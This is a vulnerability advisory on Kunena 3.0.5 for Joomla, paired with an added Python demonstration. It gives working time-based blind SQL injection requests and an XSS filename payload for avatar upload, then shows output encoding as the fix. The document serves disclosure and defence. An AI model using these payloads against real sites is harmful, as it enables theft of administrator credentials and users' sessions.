The Kunena forum extension for Joomla suffers from multiple SQL injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. The vulnerabilities affect Kunena v3.0.5 and earlier.
The blind SQL injection affects every page and task that accepts parameters in the array form “parameter[]”, because the array index (the key between the brackets) is used without validation. Since the index is attacker-controlled, SQL placed in it is evaluated by the database. An attacker can use this to read sensitive data from the Joomla database, including the credentials of the site’s administrator accounts, and from there compromise the entire website.
Blind SQL injection relies on being able to tell whether an injected condition is true or false from some observable difference in the application’s behaviour. Here that difference is response time: the injected IF() calls the database’s SLEEP() function only when the condition is true, as the following two requests show.
A true condition will cause a 10 second delay in the server’s response:
POST https://localhost/index.php?option=com_kunena&view=home&defaultmenu=130&Itemid=128
view=topics&0b4b16219de03f54bd92a580f9d4fa43=1&topics[2)+and+(if(1%3d1,sleep(10),1))%3d1%23]=1&task=unfavorite&kcheckgo=Go
Response time: ~ 11.5 seconds
A false condition will cause the server to respond without delay:
POST https://localhost/index.php?option=com_kunena&view=home&defaultmenu=130&Itemid=128
view=topics&0b4b16219de03f54bd92a580f9d4fa43=1&topics[2)+and+(if(1%3d2,sleep(10),1))%3d1%23]=1&task=unfavorite&kcheckgo=Go
Response time: ~ 1.5 seconds
The file upload and profile image (avatar) upload functions of the forum extension are vulnerable to reflected cross-site scripting: the supplied filename is reflected into the response without encoding. In addition, every page affected by the blind SQL injection is also vulnerable to reflected cross-site scripting, because the detailed error message the server returns echoes the offending parameter back into the page. An attacker may leverage this to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, which can be used to steal cookie-based session credentials and to launch other attacks such as drive-by downloads.
The following proof of concept example shows how an attacker can exploit the vulnerability on the profile image upload functionality in order to display an alert box:
POST https://localhost/index.php?option=com_kunena&view=home&defaultmenu=130&Itemid=12
-----------------------------34391417828549
Content-Disposition: form-data; name="view"
user
-----------------------------34391417828549
Content-Disposition: form-data; name="task"
Save
[…]
Content-Disposition: form-data; name="avatarfile"; filename="<iframe src=javascript:alert('XSS')>"
[…]
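To make the mechanism concrete, the following added example (not Kunena's code and not from the advisory) builds a multipart body with the same fields as the PoC, extracts the filename the way a server-side handler would, and shows an error message that echoes it raw next to one that HTML-encodes it; the boundary string, the error text and the looks_like_markup() check are all assumptions for illustration.

```python
"""Reflected XSS via an upload filename: vulnerable and fixed rendering (added example)."""
import html
import re

# Constructed boundary for this example; the PoC uses a different one.
BOUNDARY = "----ExampleBoundary34391417828549"


def build_avatar_upload(filename: str, content: bytes = b"\x89PNG\r\n") -> bytes:
    """Multipart/form-data body mirroring the PoC's view/task/avatarfile parts."""
    parts = [
        f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="view"\r\n\r\nuser\r\n',
        f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="task"\r\n\r\nSave\r\n',
        f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="avatarfile"; '
        f'filename="{filename}"\r\nContent-Type: image/png\r\n\r\n',
    ]
    return "".join(parts).encode() + content + f"\r\n--{BOUNDARY}--\r\n".encode()


_FILENAME = re.compile(rb'name="avatarfile"; filename="([^"\r\n]*)"')


def parse_filename(body: bytes) -> str:
    """Pull the client-supplied filename out of the multipart body, as a
    server-side upload handler does.  Note that '<', '>' and quotes other than
    '"' pass straight through: nothing in multipart parsing neutralises them."""
    m = _FILENAME.search(body)
    if m is None:
        raise ValueError("no avatarfile part in body")
    return m.group(1).decode()


def render_error_vulnerable(filename: str) -> str:
    """Detailed error message that interpolates the filename into HTML verbatim:
    the pattern behind the advisory's reflected XSS."""
    return f"<p>Upload of {filename} failed: not a valid image</p>"


def render_error_fixed(filename: str) -> str:
    """Same message with contextual output encoding applied to the untrusted value."""
    return f"<p>Upload of {html.escape(filename, quote=True)} failed: not a valid image</p>"


def looks_like_markup(filename: str) -> bool:
    """Assumed detection check for upload logs: a filename carrying tag syntax or
    a script: scheme has no legitimate reason to exist."""
    return re.search(r"[<>\"']|javascript:", filename, re.IGNORECASE) is not None


if __name__ == "__main__":
    body = build_avatar_upload("<iframe src=javascript:alert('XSS')>")
    name = parse_filename(body)
    print(render_error_vulnerable(name))
    print(render_error_fixed(name))
    print("suspicious:", looks_like_markup(name))
```

Encoding at the point of output is the fix; validating the filename on input is defence in depth, not a substitute, because the same value may be reflected by more than one code path.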
Solution
The vendor has released a new version (3.0.6) to address the security vulnerabilities discovered by Dionach. The new version was released on the 28th of July 2014. Users are advised to update the Kunena forum extension for Joomla to the latest secure and stable version.
References
https://www.securityfocus.com/bid/68956/